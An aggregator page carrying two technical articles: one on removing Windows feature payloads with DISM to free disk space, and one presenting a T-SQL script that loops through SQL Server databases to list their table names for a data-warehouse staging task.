Remove Features on Demand Modern versions of Windows allow you to enable or disable Windows features on demand. You’ll find a list of these features in the Windows Features window you can access from the Control Panel. Even features you don’t have installed — that is, the features you see unchecked in this window — are stored on your hard drive in your WinSXS folder. If you choose to install them, they’ll be made available from your WinSXS folder. This means you won’t have to download anything or provide Windows installation media to install these features. However, these features take up space. While this shouldn’t matter on typical computers, users with extremely low amounts of storage or Windows server administrators who want to slim their Windows installs down to the smallest possible set of system files may want to get these files off their hard drives. For this reason, Windows 8 added a new option that allows you to remove these uninstalled components from the WinSXS folder entirely, freeing up space. If you choose to install the removed components later, Windows will prompt you to download the component files from Microsoft. To do this, open a Command Prompt window as Administrator. Use the following command to see the features available to you: DISM.exe /Online /English /Get-Features /Format:Table You’ll see a table of feature names and their states. To remove a feature from your system, you’d use the following command, replacing NAME with the name of the feature you want to remove. You can get the feature name you need from the table above. DISM.exe /Online /Disable-Feature /featurename:NAME /Remove If you run the /GetFeatures command again, you’ll now see that the feature has a status of “Disabled with Payload Removed” instead of just “Disabled.” That’s how you know it’s not taking up space on your computer’s hard drive. If you’re trying to slim down a Windows system as much as possible, be sure to check out our lists of ways to free up disk space on Windows and reduce the space used by system files.     

    Read the article

  • Resolving data redundancy up front

    - by okeofs
    Introduction As all of us do when confronted with a problem, the resource of choice is to ‘Google it’. This is where the plot thickens. Recently I was asked to stage data from numerous databases which were to be loaded into a data warehouse. To make a long story short, I was looking for a manner in which to obtain the table names from each database, to ascertain potential overlap.   As the source data comes from a SQL database created from dumps of a third party product,  one could say that there were +/- 95 tables for each database.   Yes I know that first instinct is to use the system stored procedure “exec sp_msforeachdb 'select "?" AS db, * from [?].sys.tables'”. However, if one stops to think about this, it would be nice to have all the results in a temporary or disc based  table; which in itself , implies additional labour. This said,  I decided to ‘re-invent’ the wheel. The full code sample may be found at the bottom of this article.   Define a few temporary tables and variables   declare @SQL varchar(max); declare @databasename varchar(75) /* drop table ##rawdata3 drop table #rawdata1 drop table #rawdata11 */ -- A temp table to hold the names of my databases CREATE TABLE #rawdata1 (    database_name varchar(50) ,    database_size varchar(50),    remarks Varchar(50) )     --A temp table with the same database names as above, HOWEVER using an --Identity number (recNO) as a loop variable. --You will note below that I loop through until I reach 25 (see below) as at --that point the system databases, the reporting server database etc begin. --1- 24 are user databases. These are really what I was looking for. --Whilst NOT the best solution,it works and the code was meant as a quick --and dirty. CREATE TABLE #rawdata11 (    recNo int identity(1,1),    database_name varchar(50) ,    database_size varchar(50),    remarks Varchar(50) )   --My output table showing the database name and table name CREATE TABLE ##rawdata3 (    database_name varchar(75) ,    table_name varchar(75), )   Insert the database names into a temporary table I pull the database names using the system stored procedure sp_databases   INSERT INTO #rawdata1 EXEC sp_databases Go   Insert the results from #rawdata1 into a table containing a record number  #rawdata11 so that I can LOOP through the extract   INSERT into #rawdata11 select * from  #rawdata1   We now declare 3 more variables:  @kounter is used to keep track of our position within the loop. @databasename is used to keep track of the’ current ‘ database name being used in the current pass of the loop;  as inorder to obtain the tables for that database we  need to issue a ‘USE’ statement, an insert command and other related code parts. This is the challenging part. @sql is a varchar(max) variable used to contain the ‘USE’ statement PLUS the’ insert ‘ code statements. We now initalize @kounter to 1 .   declare @kounter int; declare @databasename varchar(75); declare @sql varchar(max); set @kounter = 1   The Loop The astute reader will remember that the temporary table #rawdata11 contains our  database names  and each ‘database row’ has a record number (recNo). I am only interested in record numbers under 25. I now set the value of the temporary variable @DatabaseName (see below) .Note that I used the row number as a part of the predicate. Now, knowing the database name, I can create dynamic T-SQL to be executed using the sp_sqlexec stored procedure (see the code in red below). Finally, after all the tables for that given database have been placed in temporary table ##rawdata3, I increment the counter and continue on. Note that I used a global temporary table to ensure that the result set persists after the termination of the run. At some stage, I plan to redo this part of the code, as global temporary tables are not really an ideal solution.    WHILE (@kounter < 25)  BEGIN  select @DatabaseName = database_name from #rawdata11 where recNo = @kounter  set @SQL = 'Use ' + @DatabaseName + ' Insert into ##rawdata3 ' + + ' SELECT table_catalog,Table_name FROM information_schema.tables' exec sp_sqlexec  @Sql  SET @kounter  = @kounter + 1  END   The full code extract   Here is the full code sample.   declare @SQL varchar(max); declare @databasename varchar(75) /* drop table ##rawdata3 drop table #rawdata1 drop table #rawdata11 */ CREATE TABLE #rawdata1 (    database_name varchar(50) ,    database_size varchar(50),    remarks Varchar(50) ) CREATE TABLE #rawdata11 (    recNo int identity(1,1),    database_name varchar(50) ,    database_size varchar(50),    remarks Varchar(50) ) CREATE TABLE ##rawdata3 (    database_name varchar(75) ,    table_name varchar(75), )   INSERT INTO #rawdata1 EXEC sp_databases go INSERT into #rawdata11 select * from  #rawdata1 declare @kounter int; declare @databasename varchar(75); declare @sql varchar(max); set @kounter = 1 WHILE (@kounter < 25)  BEGIN  select @databasename = database_name from #rawdata11 where recNo = @kounter  set @SQL = 'Use ' + @DatabaseName + ' Insert into ##rawdata3 ' + + ' SELECT table_catalog,Table_name FROM information_schema.tables' exec sp_sqlexec  @Sql  SET @kounter  = @kounter + 1  END    select * from ##rawdata3  where table_name like '%SalesOrderHeader%'

    Read the article

< Previous Page | 403 404 405 406 407 408 409 410 411 412 413 414  | Next Page >